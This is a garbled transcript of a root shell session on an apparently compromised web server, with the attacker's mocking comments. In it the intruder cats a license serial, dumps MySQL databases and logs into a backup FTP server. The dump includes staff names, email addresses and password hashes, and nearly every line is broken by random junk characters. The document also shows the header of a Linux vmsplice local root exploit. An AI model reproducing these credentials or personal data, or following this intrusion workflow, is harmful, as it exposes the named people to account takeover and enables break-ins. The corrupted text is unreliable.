sh-3.2# cd ..- O! Z; p& x4 G5 I0 ]
sh-3.2# cd com
! ~0 ~0 C; L( R, @# D+ E rsh-3.2# ls -la
7 E; o2 S+ P' Ltotal 141208 J! D7 G/ S3 g) T i% h* t
drwx–x–x 10 com com 4096 Apr 28 12:40 ./ w% ^# [: ^- k9 u+ y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 p7 V; @9 i8 _
drwx—— 2 com com 4096 Jun 4 04:04 backups
: h. T# i% J0 }- K: S* E-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql. f1 m& G/ }3 _
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
, Q' R8 y. } |7 Q. J9 \5 t. {-rw——- 1 com com 21880 Jun 2 08:07 .bash_history p% k1 t5 O. E/ Z* {& U H3 U
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
) Z0 w: J& E4 M/ w" ^-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
u9 G( `+ v9 A-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
* ^, @# b9 U: o1 pdrwx–x–x 3 com com 4096 Jan 29 2008 domains! W4 q7 R, M) [4 P9 }
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed- ` p( e8 y& j3 Q& J
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
- R% }) A6 Z" W( t/ ^-rw——- 1 com com 69 Nov 18 2008 .lesshst
, e" k: Z7 Z! }/ E( j [% Gdrwx—— 2 com com 4096 Sep 24 2007 mail( Z* v; @0 e* P5 B
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
% E7 _( T9 k6 M9 ^. p) Y% tdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp" J/ b+ q5 m% w
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
1 C* T0 m9 h# W: Z e# n# D0 s: |-rw-r—– 1 com mail 34 Sep 24 2007 .shadow8 y5 V1 G8 k" d# e
drwx—— 2 com com 4096 Aug 26 2008 .ssh! m N' v, K/ m8 T
-rwx—— 1 com com 8515 Feb 10 2008 t5 a% u. A6 ~) I2 g' _ Z
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c- @4 g6 U, ~3 Q+ M* d
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
$ c5 m/ X0 O& g. ~: c C7 d& B) e-rw-rw-r– 1 com com 617 May 20 2008 .toprc
9 |2 H7 B2 q; a# o, {: S-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql3 E) }! L/ L. M* U
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
; a, q7 \7 x& U; c1 y7 z9 P-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc; u- X# S/ l; I0 z
- o7 D- a+ S1 o- |7 c4 m9 s+ Y# O! [
sh-3.2# head t.c
; { O% ^) H# T/*
8 ~% f1 u+ L5 a" p! ?/ Z* jessica_biel_naked_in_my_bed.c0 n7 P' c9 g$ \9 J0 B; @
*2 q- T+ x3 r/ r
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.0 @. ^' b; A: N; [, ?( P
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.9 Y' c+ P2 V% |8 w9 R+ U. E9 `
* Stejnak je to stare jak cyp a aj jakesyk rozbite.- r0 g9 ~6 x0 _* Z' `9 y
*
% [/ i" j) E' Q3 a& A3 @7 f3 B' m* Linux vmsplice Local Root Exploit
. _) n" j. K4 J* By qaaz: C) H0 C" w" f- i" B
*
+ B% C, C/ i) e) h! C* o
4 U& h* [' o( G- \$ esh-3.2# cd /+ d/ D) _: P/ `# I6 G
sh-3.2# ls -la: d( C: ^+ g$ b1 y2 K
total 3603 v; K! w& u$ |6 y x+ S
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
, `, ^( K# a- Y' U$ R& r9 udrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
0 Y! U6 w4 m2 e-rw——- 1 root root 10240 Jun 3 02:39 aquota.group: w& d i+ A2 r$ z" k2 [& S
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
: z. ]" [+ s7 \, H-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db% G5 u5 p) B$ [. F" T8 m
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck$ Y' ~) Z- I3 j
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel% D/ h4 S. ?' a' E: e# Q
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
* W9 p0 j1 }* B4 w) idrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
* Q1 f8 U* W. ?) a* \( c0 B0 ^' xdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
5 p9 F, y3 X; @# `drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev7 v) D9 i {' ~/ k3 _% M' R1 A
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
# J* i% \8 L2 Q) x5 `* Fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home2 R3 K& }0 @3 u
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
2 ~$ N5 X+ m* _8 ~* r: A5 ddrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib# z% o e+ i4 n' Y) N$ H
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib642 B0 D* \8 L7 ^- J: }7 Q1 G0 d7 x
drwx—— 2 root root 16384 Sep 11 2007 lost+found
% S T/ I! l/ y% Y+ [drwxr-xr-x 2 root root 4096 Mar 11 17:56 media- }9 @$ Y5 K+ T0 l! Z7 d# s
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc1 ?4 C, F4 c' Z
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt' S3 V$ e7 [0 b, [9 ]* J
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
/ h0 q( i' {, n xdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
+ p! U0 J2 P8 w# T& A1 w( K B9 ?# W/ vdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
; f X' N0 W3 Z/ Cdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
G+ E0 L9 G- }% h: R* p, l; t" O3 Qdrwxr-x— 15 root root 4096 Jun 4 08:40 root
* U ?0 i* t( e3 ndrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
Y$ V- j; l( u% y1 w# zdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
% e7 T6 v1 P; k) P! Y' _/ Kdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
1 L& r' F% U/ C. J9 i# Rdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
% B' q; Y* z2 V4 U$ g% Udrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
3 K$ s+ l, K) [! {9 Q4 L! ?/ _' kdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
% M* \ p: R& x J" h& T: d6 Tdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var, B" \) g1 G7 m) M: m' _) G
n( p( A+ p( C4 s( k' {sh-3.2# cd opt
& I, y- Z: B- C1 \sh-3.2# ls -la# {0 L! R) u( }( f' `; P1 k( p
total 20
' b5 q0 D/ Z0 |% Xdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ./ Z& K0 ?9 d! ^6 {. |- K
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
; _# B; O3 g: b; U( X g% Y4 H1 Pdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
" z5 _5 u; G# a5 Q; a* G& @% R8 C) a- D4 E# {
sh-3.2# cd lsws/
* c! S; @: J2 F1 w0 M3 b: q2 wsh-3.2# ls -la
! ]& s! t6 \' r4 Ztotal 1082 B+ x3 n3 `1 t) u. R
drwxr-xr-x 15 root root 4096 Mar 20 2008 .1 e" s- m: L8 d0 D8 t" z2 t
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
( O* _: X& E+ }7 Ndrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
: j; c6 J# t- B! v; ddrwxr-xr-x 13 root root 4096 May 29 15:10 admin, J$ D3 M4 u( L
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate: i7 f3 S a' t6 U1 K4 V+ ~
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
6 Z$ x+ |9 ~ y3 x/ |5 \drwx—— 4 apache apache 4096 Jun 3 02:43 conf! e9 I6 z( f/ e: T5 J
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT/ J1 q3 q6 S" u4 U V
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs% C; F8 Z3 o& S7 o; G% X
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin% c5 y% n0 U1 }3 v G" q0 A
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib7 _7 Q; w6 }1 w0 s* ?* _7 R
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE( y8 s4 Q, @9 e" e( b0 D6 _- K
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
4 ~0 V, b2 h! k! O" L-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
7 g8 [5 t; I( x5 o-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP W) n, C7 _, b8 l* m( v+ P/ Y0 w9 z
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
8 O& I0 V8 X) a/ S5 d; s! xdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
8 X! P2 d! i) ^7 \& b9 Sdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
, S2 i, ] _: M: mdrwxr-xr-x 3 root root 4096 Mar 20 2008 share2 f5 Y) B6 Y: X3 e
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
/ I/ ~8 b0 e$ ^& @! J" W
* ~3 `* x2 a2 }, I2 I. f, V2 msh-3.2# cd conf' N, c9 a- g& ~' F% A+ T
sh-3.2# ls -la5 R/ K. g h! [+ j
total 48
b7 ~2 r! ~7 W( O9 P6 W* Ydrwx—— 4 apache apache 4096 Jun 3 02:43 .
9 W( E# h6 y! X% gdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..7 H6 Q& r! b0 k
drwx—— 2 apache apache 4096 Mar 20 2008 cert& N2 U$ S' U1 W8 I! e4 u1 G! g- [& e
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
5 p, B; V7 y$ ?! ^& P2 A {% B-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
* U- q$ \) W) o/ ^' S-rw-r–r– 1 root apache 0 Jun 3 14:11 .last: Q0 G: A, Q$ x0 F( N! c1 j
-rw——- 1 apache apache 256 May 29 15:10 license.key* o7 x$ u$ u+ I5 O
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
2 f+ x6 w6 }0 [8 f1 k+ N7 ^-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties5 W4 V" ]8 v7 @; o# x5 |0 y" J
-rw——- 1 apache apache 20 May 29 15:10 serial.no
+ I" y+ L4 W+ [) N2 _, q# ?drwx—— 2 apache apache 4096 Mar 20 2008 templates
: U+ X& j+ i5 w' B9 Z' W
( k* j$ ]( p( H5 m) ~sh-3.2# cat serial.no
- J; B, r6 v/ AIbDl-oVsO-CKqL-wVRa
/ E4 L) _* F4 {# O. y2 |( i/ L$ C h' I( ]4 z: \3 M
sh-3.2# mysql; F/ v0 G) P+ Z# T: B
Welcome to the MySQL monitor. Commands end with ; or \g.' ]& {& Z% ?( h( P2 z) z! g
Your MySQL connection id is 286844
& ]4 a$ Q8 }1 X7 b' _. JServer version: 5.0.45-community-log MySQL Community Edition (GPL)
, X, E( r9 n, e2 [3 n! l8 _' p4 h, q9 q! [ {0 \. p8 O4 P! H
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.4 D* }) E. ?8 F2 x. q' o9 K& s
0 T2 s* E0 \1 a$ x: S+ H
mysql> show databases;
! ^1 r2 ]& k& } D _+———————–+
2 J% ~/ ?/ `, _9 V; H4 I! q| Database |
5 E5 F) B9 T6 J- P3 l4 @' k+———————–+
$ y' b2 g* K. b1 p7 H# c" b| information_schema |
+ P g5 G5 a' H# z% s( T# H% D% B| astanet_ads |/ v! p( c. r; ~/ Z ^- E8 d d
| astanet_mailing_lists |
7 Z: s. L( X2 m( F| astanet_mediawiki |+ K. D2 m$ @/ B1 v, i
| astanet_membersystem |
1 e7 a; C; ~* h% C| com_contrexx |- |1 c3 A2 ?, J; O
| com_contrexx2 |
* ?- O: v: }# R) k9 Z| com_contrexx2_live |
7 e7 C) r5 K. G) |% X# x| da_roundcube |( L6 f- ~2 p/ \
| dolphin |- o: O5 B; C( [: Z! A" V2 r; p
| ideapool |
7 L. s ?/ k6 `: p+ ]| mysql |
1 S$ ?: ?' S7 a# [. @* L| test |
. ]4 E" `6 o6 u| yourmaster |3 [' U1 G2 r" M4 E- }" R3 x
+———————–+" n' ~$ E L9 ~8 f2 E
14 rows in set (0.00 sec)5 k; d9 }4 C4 X' f
' D5 b% l: M: N" G. Gmysql> use ideapool' B4 _# T) ~: n( T' F$ ?) M; Z
Database changed
5 k* |+ A6 u' R: S, Zmysql> show tables;" {; Z: S; d2 r, N' R
+———————————–+
( y- |- e9 K+ e# y. q# _| Tables_in_ideapool |6 G3 R O/ a3 [: v: a
+———————————–+* R0 A3 M8 E$ ]( S4 K% b
| eventum_columns_to_display |
8 ] B, l, p8 n4 E| eventum_custom_field |
, Q9 ^' k& Z* _7 ?" ]5 q* K| eventum_custom_field_option |
) i: P4 L8 a* B# c6 j9 S0 A% }| eventum_custom_filter |
3 L' ~8 m: g; ]1 d| eventum_customer_account_manager |
+ O+ S9 j' o$ G7 w9 T! O| eventum_customer_note |" ~; F" w V8 M0 Y/ C1 t
| eventum_email_account |
2 r+ e! f- Z7 K| eventum_email_draft |
0 a- b' M- B1 Z$ ^9 r! ^6 L# p| eventum_email_draft_recipient |) L9 V4 r* F8 ]8 T" U
| eventum_email_response |. V7 b0 V+ o( a( c/ }) @2 ]6 E
| eventum_faq |
& g- p9 ?5 o& e e| eventum_faq_support_level |
0 }" z9 p, ]5 ^* u, T5 Y| eventum_group |
" @( I4 T7 \' D2 O| eventum_history_type |" A% w) J K {- F
| eventum_irc_notice |
. P! j/ k9 N9 F. `" i3 t- K$ J| eventum_issue |2 v, r; T0 `8 T& J$ g: X$ i4 u
| eventum_issue_association |, O+ n( u E( T$ b8 C6 v
| eventum_issue_attachment |5 \3 v3 M4 i" J6 p0 S" {1 a
| eventum_issue_attachment_file |6 F2 y/ m: P! x% X" |& o: h' U' b
| eventum_issue_checkin |8 a. a6 ^* \3 T' V+ W& f9 |( j
| eventum_issue_custom_field |
" n- M1 [4 V* r# O+ t- o) k1 [| eventum_issue_history |
( t; d0 m, r; m/ H+ H2 Q| eventum_issue_quarantine |/ o; i; e' N; t0 N l) M
| eventum_issue_requirement |
7 G. G! `4 W8 }9 r f& T& ?2 d1 p| eventum_issue_user |; c5 M8 P& |. B' T
| eventum_issue_user_replier |
8 j. j5 c, W j- ^, D5 Q| eventum_link_filter | p* Q8 ?2 F! _7 n
| eventum_mail_queue |( |7 v& U* ?, z8 y7 O5 C) v4 }! W
| eventum_mail_queue_log |- ?& D+ @* O ~* @0 ?
| eventum_news |
* ?- K5 _( F. H8 i4 o| eventum_note |6 q" v( q$ R' M+ F
| eventum_phone_support |
2 p6 b: u2 A0 n+ p7 || eventum_project |& v: J I9 |: s9 ]5 Q! m
| eventum_project_category |
; _: s h. z$ O3 B| eventum_project_custom_field |
4 K+ [' a5 r9 Z" J- M! r5 z| eventum_project_email_response |
6 ?. X Q& a6 H' | z| eventum_project_field_display |
, D1 t/ o. U+ o| eventum_project_group |7 K' X2 V3 _8 `
| eventum_project_link_filter |; z- f2 C8 [" I. b5 W& A% Q, @
| eventum_project_news |1 o, b5 W. J4 I; ]5 O
| eventum_project_phone_category |
& Y9 s$ e0 ?$ N. r. Z% P| eventum_project_priority |
* W# D; T2 D0 @$ D| eventum_project_release |
) t+ X+ h7 L$ W) ]| eventum_project_round_robin |4 F* f# D6 d1 I1 L4 s# ~$ `7 B
| eventum_project_status |( r2 J( y0 o4 y7 a2 l! t9 T
| eventum_project_status_date |; ~. n! v' g8 S4 d- x; y% }
| eventum_project_user |- r* s- G' ?6 w5 K
| eventum_reminder_action |
& W/ E; B: M; u: || eventum_reminder_action_list |
% Y. d0 v0 q( t* j5 C9 J$ Q- i| eventum_reminder_action_type |, A4 C v+ G$ S- T& f9 W
| eventum_reminder_field |
7 D0 E8 r! \1 W& B; \8 T| eventum_reminder_history |" l- n1 H! u/ r- `2 `
| eventum_reminder_level |
S0 M u5 |3 @2 e X' h' ~& T| eventum_reminder_level_condition |+ y! N$ x+ z8 q7 }# F& I$ o
| eventum_reminder_operator |
/ x; l( l- O d8 w9 @! G8 C| eventum_reminder_priority | }. }7 W5 T3 M" B- Z m+ i# |
| eventum_reminder_requirement |
( U0 Q) D! o- l2 E% y0 j| eventum_reminder_triggered_action |) Z7 j) j) h# ^
| eventum_resolution |; w# P) P3 w. s) O7 b
| eventum_round_robin_user |
- e' Q" C1 J: ?9 e R9 i| eventum_search_profile |
2 b9 y4 P5 H- H, @) ?| eventum_status |: K9 }8 h" F% e: x' g# \* [
| eventum_subscription |) W5 b; R* P' Q/ \5 m6 V
| eventum_subscription_type |: d' N. v1 I. A% P |1 [4 z" L$ u) q
| eventum_support_email |
7 ?# [, a' s5 t2 C| eventum_support_email_body |! y7 n1 i! a* o
| eventum_time_tracking |
$ H1 ]" ~, Q" }( h+ D! x2 V8 n1 i| eventum_time_tracking_category |
, M7 x- f6 ~$ w| eventum_user |! O+ T0 |" j+ u F+ L$ ^2 x2 V
+———————————–+
1 S/ r7 V1 `9 C( ~3 r69 rows in set (0.00 sec)
4 Z0 o. K0 Z8 F: Y; g, _% T6 _5 s; f4 }7 M. |; B
mysql> describe eventum_user;
" r5 Q4 _* I W2 m5 A0 [$ F2 B+————————-+——————+——+—–+———————+—————-+
; l$ \3 s+ @1 ^1 L; || Field | Type | Null | Key | Default | Extra |
* B8 [" m% a x" e+————————-+——————+——+—–+———————+—————-+
9 k+ }- B; u4 W& I# N+ t| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |3 |0 G* D& }; Q( z+ B: |
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
& K4 t) ^" a( _9 A| usr_customer_id | int(11) unsigned | YES | | NULL | |! e2 i& U4 U/ q. m( _- B
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |: E% Y3 Z9 q9 u2 l
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |) {* S# r& ~: e# S) c# L
| usr_status | varchar(8) | NO | | active | |
; U1 l2 a: z1 w( w( {| usr_password | varchar(32) | NO | | | |3 ^& r" O+ w% M. b# y% @6 G
| usr_full_name | varchar(255) | NO | | | |- z1 O( o; M) Z3 h8 S+ O
| usr_email | varchar(255) | NO | UNI | | |
$ S( ^6 ~. @+ l| usr_preferences | longtext | YES | | NULL | |" y0 ~& q6 ?; t3 K a" ]
| usr_sms_email | varchar(255) | YES | | NULL | |) M9 K% S U% Q
| usr_clocked_in | tinyint(1) | YES | | 0 | |
& @0 J& r R6 _0 ^/ s| usr_lang | varchar(5) | YES | | NULL | |
# _# j$ A7 V$ j% O+————————-+——————+——+—–+———————+—————-+9 \7 W" _4 t3 L- z8 i+ I& ?
13 rows in set (0.00 sec), ^ p0 l5 _& F, ]0 Q9 M$ x
0 J% `: ^7 x. e3 ]7 j" ?$ {
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
- }( l) x: R/ C4 d% F+———————-+——————————-+———————————-+/ I: t8 V/ F) c+ ^
| usr_full_name | usr_email | usr_password |1 X; v$ y# ` E- @$ X; @" ]3 r
+———————-+——————————-+———————————-+, v% A4 H6 N# F8 q0 u' L5 X
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |! P# k9 ^3 n. O$ q3 ]
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |" b- q! Q! {7 J6 T$ z! C; z6 A* ]
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce | @ z9 s" e2 I- t0 n
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |$ T* n1 l, K4 a+ g& V1 f
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |5 R1 D. ^" h8 |) v2 A4 ^ P1 W0 `8 Y
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
5 W( }* N8 T: `4 d: p/ [| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
$ J* r2 j9 {: _- n& A( C3 a2 Q0 a# [( h1 R| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
. a/ {( u/ z) A0 U% P* t| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 r9 Q0 i3 v5 N+ i% C| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
7 j- q2 C: C* E. x2 |1 d- P| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |# N- U4 }5 f* _
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
& R2 u/ Y' \5 a, Y' m/ [| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
7 p( q# p% ~; t4 W5 ]| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
+ P$ D0 v7 q7 v5 s' S7 S# d1 V| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |+ l* C; e& E0 B8 t: @4 }
+———————-+——————————-+———————————-+9 U& O Q: |, {9 Q
15 rows in set (0.00 sec)$ B: l h5 U/ X Z- k2 S0 e! o
4 O% R) y% H0 _0 U" z/ t/ _8 g
mysql> select iss_description from eventum_issue where iss_id = 43;
- {& ~7 S. h% A& v5 N% F( U5 `" c+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+3 u& P5 N7 T! v v0 `; q" r
| iss_description ; G/ `4 _9 Y" I5 G+ _
|
, G% e+ M" n6 H8 Q- B) d Y- l* v+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+; x" Y% w" Z" U3 V
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
" J- `$ ~4 ]$ `- Q* ?connected for 90 mins… 120mins… so what i propose is something like:
+ H- w* q4 Q$ @4 V% P4 t3 p- I链接标记[url]http://www.surfthechannel.com/[/url]' ]7 A$ k7 w1 O4 Z! J* C
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system' u( v& W3 ]% |7 D* B0 Y+ I
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
a( q/ C0 g2 }4 K2 abreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off0 r+ { x7 E) I' H) u8 h% H0 Z
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…. @8 l( L4 O& P, c% G3 c% B" w
+ s2 Z3 m+ L) h" r) X' U& S! MWe could also put advertisement during play on the flash video player itself… extra $$…
' m/ E. n k& S' Z; L7 U$ E8 u# {
. a0 d. f% l- B! X: N: oBy sykadul |- K" ?& H; q2 M5 j0 `
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
+ P6 p/ e- ?5 L& ]+ c1 row in set (0.00 sec). B8 p6 c4 _9 i3 Q: R! _$ I
. C* [3 z% Q6 @4 {( ?" `( V
// Money and extra $$ is all they care about. remember that.
3 b% R+ ]2 }" Q1 x! W1 }" b* `0 S/ G$ w3 u2 ^+ w$ [! a- l$ q
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
/ m! ~5 m# u* S/ x' `" y+————————+——————————————————————————————————————————————————————————————————————————————-+
/ C: \5 Y7 @0 q$ N| iss_summary | iss_description * U8 D. h1 b& l
|
( O* m$ @% X2 V z+————————+——————————————————————————————————————————————————————————————————————————————-+' u" z+ W/ [- m& d7 N0 K
| Forum for REAL EXPERTS | Hello,9 e+ ~9 o5 O1 p! P
0 d6 `$ ?2 t. C a m
Ishtus and I,/ F( D+ Z7 U9 m3 ]& Z
2 V9 n& V7 m+ Z X- vCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
5 E9 S* y$ d7 e5 y; EONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
3 v, P8 U \2 O7 L, M3 p
8 j; g9 C. d7 kOne example a friend of mine from coresecurity.com!
- r, g% N r* H5 \
: l4 Z* j9 N7 |, b, fWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..0 M# L- i/ h' _, y
9 h7 ^4 C) V7 k- O- O/ l6 v# Z|5 D( K, T4 z4 w: C! x; l
+————————+——————————————————————————————————————————————————————————————————————————————+& X C6 }6 o+ g
1 row in set (0.00 sec)
0 G( T8 g. q; m2 {7 R' l( M# G( ]8 ?) ]# K
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…2 T* k6 H" r0 y b. h
+ ^$ {" h5 s* gmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;5 y) {+ E! A! a/ Q1 J+ m: b, N2 u
+——————+———————————————————————————————+
' s# {# X* l: ^4 T3 Z% J| iss_summary | iss_description |
3 g0 s* v! @. B, b. [1 c8 A+——————+———————————————————————————————+
$ j$ r% j& L3 \& || Website guidance | Virtual Girl which guides you trought the website.- t! X0 b; P: E# p; t1 i$ K0 e9 o
1 z" r9 j+ ~' I A, m1 U0 h
We need a girl with who you can ( talk )!!!$ n* L; b3 [) \1 L3 `# l
Also for the News!
. n" z9 _% t: B" S9 Y: z( d4 Q$ T" {So my suggestion is a girl who read you the news loud if you like!, s# W7 L5 N# g& M- k$ i
you can choose between read yourselfe or she read it for you or both!
# @+ c* F) s. j+ f4 }1 n1 I& L r- y) O+ A1 v3 L
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
& }# R% }/ c3 |6 M a) p3 s$ G# ~1 @+ o/ S _" ?/ ?; Z+ C
Have a look on the example girls!!* T$ p- j0 s/ J3 w4 m
3 n( V8 W7 K( |7 L# b' a5 L8 o4 G
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]6 x- Q% R& S; S( s
* W9 \! T4 Z% Z ]or that! a2 X2 ?- w% Q4 q) r+ N" d0 Y+ I
: l6 Z X6 Q8 W/ r. q% C8 C$ V链接标记[url]http://www.yellostrom.de/[/url]8 z9 B) B9 m& J! M2 l8 w
8 w3 K# K& {$ B4 `* ], ]: G
|# |9 `7 g- j7 J# Z/ p
+——————+———————————————————————————————+, G) T2 `5 J: A
1 row in set (0.00 sec)
+ c( N/ K/ D* Y0 L0 {
4 |& X3 }6 r0 ]9 J( C# b# e$ `// ha ha.
2 i r8 t# m' P7 E3 j0 T
& U$ Q5 R8 S7 ?) umysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
2 z g- \* Z g i0 H) u' x+————————–+———————————————————————————————————–+
% o: k2 G: G, n6 {7 y) q| iss_summary | iss_description |
& f9 }+ p- \1 J9 K, ?: u$ j5 j+————————–+———————————————————————————————————–+ |$ Q/ c0 ?& u% I6 p7 X
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |! z2 X! n! m3 ?& I) H; h
+————————–+———————————————————————————————————–+
; E) N4 ^" K! s1 row in set (0.00 sec)
9 `9 u# n# y. H/ D$ Z' A3 h- j4 c/ F$ Z1 L: Q b; V
// LOL.. Q8 t' @( p; _! I( l
- s8 u% p7 m4 W$ p; ~# k5 Y
mysql> exit- @) ?, G( V! x2 b
Bye$ |5 d1 z3 N' D0 H2 p" Q3 V# Q
; E( A" z5 w4 A( g1 z9 _sh-3.2# ftp 212.254.194.163
: F! r8 [' ^/ Z0 J+ s* r# n) f' VConnected to 212.254.194.163.
4 C; ]- S j9 B+ O9 l) }9 [1 D- V220 BackupCOM_VW FTP server ready.
" k. [5 X6 [1 I504 AUTH: security mechanism ‘GSSAPI’ not supported.
$ ]3 R# t+ w0 ^9 b- U2 k504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
( b- V6 W$ _9 L% F- O2 @: D( S$ eKERBEROS_V4 rejected as an authentication type' s1 B2 I* ?2 G7 S" }5 c
Name (212.254.194.163:root): astalavista.com
) K8 P6 d I7 }' | ?; Y331 Password required for astalavista.com.
% E) I. C* ]+ d+ ?Password:
, g* X" A1 o, C" Z* k* f8 o230 User astalavista.com logged in.
1 G) |& M) u5 L# i" tRemote system type is UNIX.. E- I N' Q0 K2 p" a0 q- V0 P8 {
Using binary mode to transfer files.
$ }, j& v) E& t4 I4 X! ?5 c. rftp> ls -la
& o# x0 T- R: T8 x, R; q227 Entering Passive Mode (212,254,194,163,2,188)
& G7 A% m1 Q' T& |% `4 V# f6 h150 Opening BINARY mode data connection for ‘file list’.' Q" k6 K# k' @" s
